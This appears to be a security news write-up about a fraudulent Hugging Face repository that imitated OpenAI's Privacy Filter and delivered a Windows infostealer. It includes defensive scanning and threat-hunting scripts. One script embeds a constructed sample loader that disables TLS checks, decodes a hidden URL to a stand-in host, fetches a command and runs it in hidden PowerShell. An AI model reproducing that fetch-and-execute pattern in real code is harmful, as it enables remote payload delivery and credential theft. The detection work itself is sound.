What happened
A malicious package masquerading as an OpenAI release is at the center of this update. A fraudulent Hugging Face repository impersonating an OpenAI release delivered infostealer malware to Windows systems, accumulating approximately 244,000 downloads before it was removed. The attack highlights the growing security risks of public AI model registries.
Hugging Face Repository Disguised as OpenAI Release Spreads Malware
A malicious repository hosted on Hugging Face, falsely presented as an official OpenAI release, was found distributing infostealer malware targeting Windows computers. Researchers at AI security firm HiddenLayer reported that the repository, named Open-OSS/privacy-filter, was downloaded around 244,000 times before it was taken down, although they suspect the attackers inflated that count to make the repository look more popular than it was.
Imitation of OpenAI’s Privacy Filter with Hidden Malware
The counterfeit repository closely copied the model card and documentation of OpenAI’s legitimate Privacy Filter release. Embedded within it was a loader.py file that launched credential-stealing malware when run. The repository quickly gained traction, reaching the top of Hugging Face’s trending list with 667 likes in under 18 hours, a figure that may also have been manipulated.
How the Malware Operated
HiddenLayer’s analysis found that loader.py opened with seemingly benign model-loading code but concealed a multi-stage infection chain. The script disabled SSL certificate verification, decoded a base64-encoded URL, retrieved commands from jsonkeeper.com, and launched Windows PowerShell to download further malicious payloads. Because the next stage was fetched from a remote URL rather than shipped in the repository, the attackers could swap payloads at will without changing the repository itself.
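The three behaviours described above (TLS verification switched off, a base64-encoded URL decoded at runtime, a shell spawned from Python) are all visible statically, before anything is executed. The following is an added example of a static triage pass over a Python loader, written for this page and not HiddenLayer's, Hugging Face's or the attacker's code. The sample loader embedded in it is constructed to exhibit those three patterns and is not the real loader.py; the host example.invalid is a reserved, non-resolving name, and the verdict thresholds in triage() are my own choice.

```python
"""Static triage of a Python model loader for the indicator pattern the
write-up describes. Added example, not code from HiddenLayer, Hugging Face
or the malicious repository. SAMPLE_LOADER is CONSTRUCTED to show the
three behaviours; example.invalid is a reserved, non-resolving host."""
import ast
import base64
import re

URL_RE = re.compile(rb"^https?://", re.IGNORECASE)
SPAWN_FUNCS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen"}
SHELL_MARKERS = ("powershell", "pwsh", "cmd.exe", "cmd /c")

# Constructed sample: benign-looking loader code followed by the suspicious tail.
_STAGE2_B64 = base64.b64encode(b"https://example.invalid/stage2").decode()
SAMPLE_LOADER = f'''
import ssl, base64, subprocess, urllib.request
from transformers import AutoModel

def load_model(name):
    return AutoModel.from_pretrained(name)

ssl._create_default_https_context = ssl._create_unverified_context
u = base64.b64decode("{_STAGE2_B64}").decode()
cmd = urllib.request.urlopen(u).read().decode()
subprocess.Popen(["powershell", "-w", "hidden", "-c", cmd])
'''
BENIGN_LOADER = '''
from transformers import AutoModel

def load_model(name):
    return AutoModel.from_pretrained(name)
'''


def _dotted(node):
    """Return 'pkg.attr' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _string_literals(nodes):
    """Yield every string constant nested anywhere inside the given AST nodes."""
    for n in nodes:
        for sub in ast.walk(n):
            if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
                yield sub.value


def scan_source(src):
    """Return (kind, lineno, detail) tuples for each indicator found in src."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        # 1. TLS verification disabled via ssl or a verify=False keyword.
        if isinstance(node, ast.Attribute) and node.attr == "_create_unverified_context":
            findings.append(("tls_verify_disabled", node.lineno, _dotted(node)))
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func) or ""
        for kw in node.keywords:
            if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                findings.append(("tls_verify_disabled", node.lineno, name))
        # 2. A base64 literal that decodes to a URL: a hidden download location.
        if name.endswith("b64decode") and node.args:
            for lit in _string_literals(node.args[:1]):
                try:
                    raw = base64.b64decode(lit, validate=True)
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
                if URL_RE.match(raw):
                    findings.append(("b64_url", node.lineno, raw.decode("ascii", "replace")))
        # 3. A process-spawning call whose arguments name a shell.
        if name in SPAWN_FUNCS:
            for lit in _string_literals(node.args + [kw.value for kw in node.keywords]):
                if any(m in lit.lower() for m in SHELL_MARKERS):
                    findings.append(("spawn_shell", node.lineno, lit))
                    break
    return findings


def triage(src):
    """Map findings to a verdict (thresholds are this example's own choice):
    a remote-fetch or shell-spawn indicator blocks; TLS-only means review."""
    findings = scan_source(src)
    kinds = {f[0] for f in findings}
    if kinds & {"b64_url", "spawn_shell"}:
        verdict = "block"
    elif kinds:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "kinds": sorted(kinds), "findings": findings}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_LOADER), ("benign", BENIGN_LOADER)):
        result = triage(src)
        print(label, result["verdict"], result["kinds"])
```

Run it against every .py file in a freshly cloned repository before anything is imported; a model loader has no business decoding URLs or starting PowerShell, so either finding alone is enough to stop and read the file by hand. The scan is deliberately syntactic and will miss string concatenation or exec()-based obfuscation; it catches the plain pattern described above, which is the one most repositories that ship a loader would never legitimately contain.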
The final payload was a Rust-based infostealer that harvests data from Chromium- and Firefox-based browsers, Discord local storage, cryptocurrency wallets, FileZilla configuration files, and system information. It also attempted to disable Windows defences such as the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), and it established persistence through scheduled tasks that impersonated legitimate Microsoft Edge update tasks.
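The scheduled-task persistence described above is the easiest part of this chain to hunt for on a suspect host. The following is an added example, not tooling from HiddenLayer or Microsoft, that reads the CSV produced by `schtasks /query /fo CSV /v` and flags tasks that borrow the Edge-update name while running from somewhere the real updater does not. It assumes the genuine updater lives under C:\Program Files (x86)\Microsoft\EdgeUpdate\, and the column names it uses ("TaskName", "Author", "Task To Run") are my recollection of that CSV layout, so check them against real output. The sample rows, hostname, user and paths are constructed.

```python
"""Hunt for scheduled tasks posing as Microsoft Edge updates. Added example,
not HiddenLayer or Microsoft tooling. Assumptions: the legitimate updater
runs from EDGE_UPDATE_DIR, and the CSV columns match `schtasks /query /fo
CSV /v` as recalled here. SAMPLE_CSV is CONSTRUCTED (host, user, paths)."""
import csv
import io
import re
import sys

EDGE_UPDATE_DIR = "c:\\program files (x86)\\microsoft\\edgeupdate\\"  # assumption
EDGE_THEMED = re.compile(r"edge\s*update|msedge", re.IGNORECASE)
SCRIPT_HOST = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b",
    re.IGNORECASE)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\", "\\downloads\\")

# Constructed rows: one genuine-looking updater task, two impostors, one unrelated task.
SAMPLE_CSV = r'''"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time","Last Result","Author","Task To Run"
"WS01","\MicrosoftEdgeUpdateTaskMachineCore","N/A","Ready","Interactive/Background","N/A","0","Microsoft Corporation","""C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"" /c"
"WS01","\MicrosoftEdgeUpdateTaskUser","N/A","Ready","Interactive only","N/A","0","Microsoft Corporation","powershell.exe -w hidden -ep bypass -f C:\Users\alice\AppData\Local\Temp\edge_update.ps1"
"WS01","\EdgeUpdate","N/A","Ready","Interactive only","N/A","0","WS01\alice","C:\Users\alice\AppData\Roaming\msedgeupdate.exe"
"WS01","\NightlyBackup","N/A","Ready","Interactive only","N/A","0","WS01\alice","C:\Tools\backup.exe --full"
'''


def assess(task):
    """Return the reasons one task row looks suspicious ([] when it looks fine)."""
    name, author, action = (task.get(k, "") for k in ("TaskName", "Author", "Task To Run"))
    low = action.lower()
    themed = bool(EDGE_THEMED.search(name) or EDGE_THEMED.search(author)
                  or EDGE_THEMED.search(action))
    reasons = []
    # An Edge-update-themed task whose action is not under the updater directory.
    if themed and EDGE_UPDATE_DIR not in low:
        reasons.append("Edge-update-themed task does not run from the EdgeUpdate directory")
    # The real updater is a native binary; a script host here is a red flag for any task.
    host = SCRIPT_HOST.search(low)
    if host:
        reasons.append("action launches a script host: " + host.group(0))
    # Microsoft's updater does not live in profile or temp directories.
    if themed and any(p in low for p in USER_WRITABLE):
        reasons.append("action lives in a user-writable location")
    return reasons


def hunt(csv_text):
    """Return [(task_name, reasons)] for every suspicious row in the CSV."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = assess(row)
        if reasons:
            hits.append((row["TaskName"], reasons))
    return hits


if __name__ == "__main__":
    # Usage: schtasks /query /fo CSV /v > tasks.csv ; python hunt_tasks.py tasks.csv
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_CSV
    for task_name, reasons in hunt(text):
        print(task_name)
        for reason in reasons:
            print("   -", reason)
```

The Author column is attacker-controlled metadata and is only used here to widen the "Edge-themed" net, never to clear a task; the decision rests on where the action actually runs from and what it launches. On a host that ran the loader, treat any hit as confirmation and move straight to the re-imaging guidance below rather than deleting the task and carrying on.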
Broader Campaigns and Security Implications
Further investigation uncovered six additional Hugging Face repositories with nearly identical loader code, linked to the same attacker infrastructure. The incident follows earlier warnings about malicious AI models and software development kits distributed through public AI registries, which attackers use as an entry point into corporate environments.
Experts highlight the risk posed by AI repositories that ship executable code, scripts, and configuration files alongside the model weights themselves. Traditional software composition analysis tools often fail to detect malicious logic hidden in such project files. IDC’s cybersecurity research stresses that organizations should be tracking AI artifacts with detailed bills of materials by 2027 to improve security oversight.
Response and Recommendations
HiddenLayer advises anyone who cloned and executed files from the affected repository to treat their systems as compromised and to re-image them completely. Users should also treat their browser sessions as compromised, since stolen session cookies let an attacker bypass multi-factor authentication even when no passwords are stored locally.
Hugging Face has confirmed the removal of the malicious repository and continues to monitor its platform for similar threats.
This event underscores the growing intersection of AI development workflows and cybersecurity, emphasizing the need for heightened vigilance as AI adoption expands into enterprise environments.
Source: see original article
Why it matters
This update influences the AI race across model providers, infrastructure leaders, and enterprise adoption decisions.